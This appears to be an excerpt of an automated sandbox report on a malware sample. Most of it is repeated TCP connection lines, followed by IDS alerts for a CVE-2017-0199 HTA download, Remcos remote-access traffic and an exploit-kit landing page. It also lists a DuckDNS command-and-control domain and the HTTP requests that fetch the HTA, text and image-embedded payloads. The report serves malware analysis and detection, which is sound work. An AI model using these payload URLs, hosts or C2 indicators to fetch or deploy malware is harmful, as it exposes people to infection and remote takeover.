                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165

                  Networking

                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 135.148.195.248:6875
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 135.148.195.248:6875
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.108.133:443 -> 192.168.2.22:49167
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.108.133:443 -> 192.168.2.22:49176
                  Source: Malware configuration extractorURLs: idabo.duckdns.org
                  Source: unknownDNS query: name: idabo.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 135.148.195.248:6875
                  Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox View IP Address: 135.148.195.248
                  Source: Joe Sandbox View IP Address: 185.199.108.133
                  Source: Joe Sandbox View IP Address: 178.237.33.50
                  Source: Joe Sandbox View ASN Name: AVAYAUS
                  Source: Joe Sandbox View ASN Name: FASTLYUS
                  Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.40If-Range: "28fda-62468ee52a080"
